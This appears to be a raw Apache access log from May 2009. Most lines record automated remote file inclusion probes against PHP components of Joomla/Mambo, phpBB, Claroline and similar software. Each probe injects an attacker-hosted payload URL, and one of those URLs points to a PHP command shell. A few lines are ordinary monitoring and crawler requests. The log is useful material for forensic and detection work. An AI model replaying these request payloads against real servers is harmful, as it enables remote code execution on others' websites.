203.194.204.129 - - [31/May/2009:02:16:27 -0400] "GET /logs/administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
121.165.73.157 - - [31/May/2009:02:17:58 -0400] "GET /logs/access_log.Q108032300//claroline/inc/claro_init_header.inc.php?includePath=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 265 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
121.165.73.157 - - [31/May/2009:02:17:58 -0400] "GET //claroline/inc/claro_init_header.inc.php?includePath=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 238 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
121.165.73.157 - - [31/May/2009:02:17:58 -0400] "GET /logs//claroline/inc/claro_init_header.inc.php?includePath=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 243 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
64.6.231.215 - - [31/May/2009:02:18:12 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:18:12 -0400] "GET //modules/PNphpBB2/includes/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:02:18:12 -0400] "GET /logs//modules/PNphpBB2/includes/errors.php?error=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 240 "-" "libwww-perl/5.65"
209.59.12.99 - - [31/May/2009:02:18:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [31/May/2009:02:18:49 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
217.147.29.190 - - [31/May/2009:02:19:11 -0400] "GET //claroline/inc/claro_init_header.inc.php?includePath=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:02:19:11 -0400] "GET /logs//claroline/inc/claro_init_header.inc.php?includePath=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:02:19:11 -0400] "GET /logs/access_log.Q108081500%20%20//claroline/inc/claro_init_header.inc.php?includePath=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:02:19:26 -0400] "GET /logs//main.php?sayfa=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:02:19:26 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:02:19:26 -0400] "GET //main.php?sayfa=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:02:19:26 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [31/May/2009:02:19:27 -0400] "GET /logs/access_log.Q108032300%20%20//claroline/inc/claro_init_header.inc.php?includePath=http://www.polimerco.ru/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
58.225.75.155 - - [31/May/2009:02:20:29 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
218.249.36.194 - - [31/May/2009:02:20:48 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:02:20:48 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:02:20:48 -0400] "GET /logs//main.php?sayfa=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:02:20:48 -0400] "GET //main.php?sayfa=http://jamur-x.do.am/id1.txt??????/? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.15.161.2 - - [31/May/2009:02:21:54 -0400] "GET /errors.php?error=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
216.15.161.2 - - [31/May/2009:02:21:54 -0400] "GET /logs/errors.php?error=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
85.17.162.28 - - [31/May/2009:02:22:07 -0400] "GET //main.php?sayfa=http://jamur-x.do.am/id1.txt?????? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:22:07 -0400] "GET /logs//main.php?sayfa=http://jamur-x.do.am/id1.txt?????? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:22:07 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://jamur-x.do.am/id1.txt?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.67.16 - - [31/May/2009:02:22:07 -0400] "GET /images/home_welcome_bkgrd2.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
85.17.162.28 - - [31/May/2009:02:22:09 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://jamur-x.do.am/id1.txt?????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.225.75.155 - - [31/May/2009:02:22:25 -0400] "GET /logs/error_log.Q108102800//components/com_simpleboard/image_upload.php?sbp=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
168.143.19.89 - - [31/May/2009:02:22:25 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.825"
168.143.19.89 - - [31/May/2009:02:22:26 -0400] "GET //?path%5Bdocroot%5D=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.825"
168.143.19.89 - - [31/May/2009:02:22:26 -0400] "GET /logs//?path%5Bdocroot%5D=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 200 3567 "-" "libwww-perl/5.825"
58.225.75.155 - - [31/May/2009:02:22:26 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
58.225.75.155 - - [31/May/2009:02:22:28 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:02:23:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [31/May/2009:02:23:43 -0400] "GET //lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
195.34.78.110 - - [31/May/2009:02:23:43 -0400] "GET /logs//lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
85.119.158.133 - - [31/May/2009:02:24:17 -0400] "GET /errors.php?error=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
85.119.158.133 - - [31/May/2009:02:24:17 -0400] "GET /logs/errors.php?error=http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
83.103.72.130 - - [31/May/2009:02:24:32 -0400] "GET /phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:02:24:32 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:02:24:36 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:02:24:54 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:02:24:54 -0400] "GET /logs/access_log.Q109052100//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
168.143.19.89 - - [31/May/2009:02:25:20 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.825"
168.143.19.89 - - [31/May/2009:02:25:20 -0400] "GET //include/admin.lib.inc.php?site_path=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.825"
168.143.19.89 - - [31/May/2009:02:25:20 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.825"
168.143.19.89 - - [31/May/2009:02:25:21 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.825"
58.225.75.155 - - [31/May/2009:02:26:27 -0400] "GET //lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.79"
66.199.250.194 - - [31/May/2009:02:27:38 -0400] "GET /logs/error_log.Q108071300//lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:02:27:38 -0400] "GET //lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:02:27:38 -0400] "GET /logs//lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.813"
66.199.250.194 - - [31/May/2009:02:28:00 -0400] "GET /logs/error_log.Q108111700//lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.prismed.net/loaded61a//images/788df887d87sd.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.813"
209.59.12.99 - - [31/May/2009:02:28:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
168.143.19.89 - - [31/May/2009:02:29:32 -0400] "GET /logs/access_log.Q109050700//?path%5Bdocroot%5D=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.825"
168.143.19.89 - - [31/May/2009:02:30:31 -0400] "GET //include/admin.lib.inc.php?site_path=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.825"
168.143.19.89 - - [31/May/2009:02:30:33 -0400] "GET //?path%5Bdocroot%5D=http://idealbulgarianproperties.com/media/on.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.825"
112.175.141.41 - - [31/May/2009:02:30:45 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
112.175.141.41 - - [31/May/2009:02:30:46 -0400] "GET /logs/access_log.Q109050300//includes/mambo.php/mosConfig_absolute_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 315 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:29 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:30 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:31:30 -0400] "GET /logs/access_log.Q109051600//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:31:31 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:31:31 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:38 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:39 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:39 -0400] "GET /logs/access_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:31:40 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:31:40 -0400] "GET /logs/access_log.Q109051600//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:42 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:31:43 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:43 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:44 -0400] "GET /logs/access_log.Q109050300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:57 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:31:58 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:32:14 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:32:14 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:32:14 -0400] "GET /logs/access_log.Q109051600//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:32:32 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:32:32 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:32:32 -0400] "GET /logs/access_log.Q109051600//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:02:32:39 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:02:33:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.162.28 - - [31/May/2009:02:33:53 -0400] "GET //includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:33:53 -0400] "GET /logs//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:33:55 -0400] "GET /logs/access_log.Q109051600//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:34:18 -0400] "GET /logs/access_log.Q109050300//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:34:27 -0400] "GET /logs/access_log.Q109050300//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:34:49 -0400] "GET /logs/access_log.Q109050300//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:02:36:07 -0400] "GET /logs/access_log.Q109050300//includes/mambo.php/mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:02:38:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.237.146.58 - - [31/May/2009:02:38:43 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:02:38:44 -0400] "GET /logs/?_zb_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:02:38:44 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
80.237.146.58 - - [31/May/2009:02:38:44 -0400] "GET /?_zb_path=http://www.torgi.kz/help/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
62.149.0.248 - - [31/May/2009:02:40:19 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:02:40:19 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:02:40:24 -0400] "GET //index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:02:40:25 -0400] "GET /logs//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
62.149.0.248 - - [31/May/2009:02:40:25 -0400] "GET /logs//index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
121.173.130.41 - - [31/May/2009:02:40:44 -0400] "GET /?_zb_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
121.173.130.41 - - [31/May/2009:02:40:45 -0400] "GET /logs/?_zb_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
121.173.130.41 - - [31/May/2009:02:40:45 -0400] "GET /logs/access_log.Q109051800/?_zb_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.173.130.41 - - [31/May/2009:02:40:48 -0400] "GET /logs/access_log.Q109052200/?_zb_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:02:42:25 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:02:42:25 -0400] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:02:42:29 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:02:42:49 -0400] "GET //?path%5Bdocroot%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
83.103.72.130 - - [31/May/2009:02:42:49 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 200 3567 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:02:43:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.218.92.10 - - [31/May/2009:02:43:52 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
217.218.92.10 - - [31/May/2009:02:43:52 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
116.36.213.166 - - [31/May/2009:02:43:52 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:43:53 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
116.36.213.166 - - [31/May/2009:02:43:54 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.218.92.10 - - [31/May/2009:02:44:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
217.218.92.10 - - [31/May/2009:02:44:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
83.103.72.130 - - [31/May/2009:02:44:35 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:02:44:41 -0400] "GET /appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:02:44:41 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:02:44:41 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
221.139.104.104 - - [31/May/2009:02:45:43 -0400] "GET /logs/access_log.Q109052300/appserv/main.php?appserv_root=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
210.100.220.126 - - [31/May/2009:02:45:47 -0400] "GET /logs/access_log.Q109051500//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://r3mu.by.ru/Shells/phpcmd.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
210.100.220.126 - - [31/May/2009:02:45:48 -0400] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://r3mu.by.ru/Shells/phpcmd.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
203.194.204.129 - - [31/May/2009:02:48:14 -0400] "GET /logs//cross.php?url=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:48:14 -0400] "GET /logs/access_log.Q109052200//cross.php?url=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:48:14 -0400] "GET //cross.php?url=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:48:24 -0400] "GET /logs/access_log.Q109050900//cross.php?url=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:02:48:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.194.204.129 - - [31/May/2009:02:48:41 -0400] "GET //cross.php?url=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:48:41 -0400] "GET /logs//cross.php?url=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:48:41 -0400] "GET /logs/access_log.Q109052200%20%20//cross.php?url=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
203.194.204.129 - - [31/May/2009:02:48:41 -0400] "GET /logs/access_log.Q109010700%20%20//cross.php?url=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:02:49:03 -0400] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
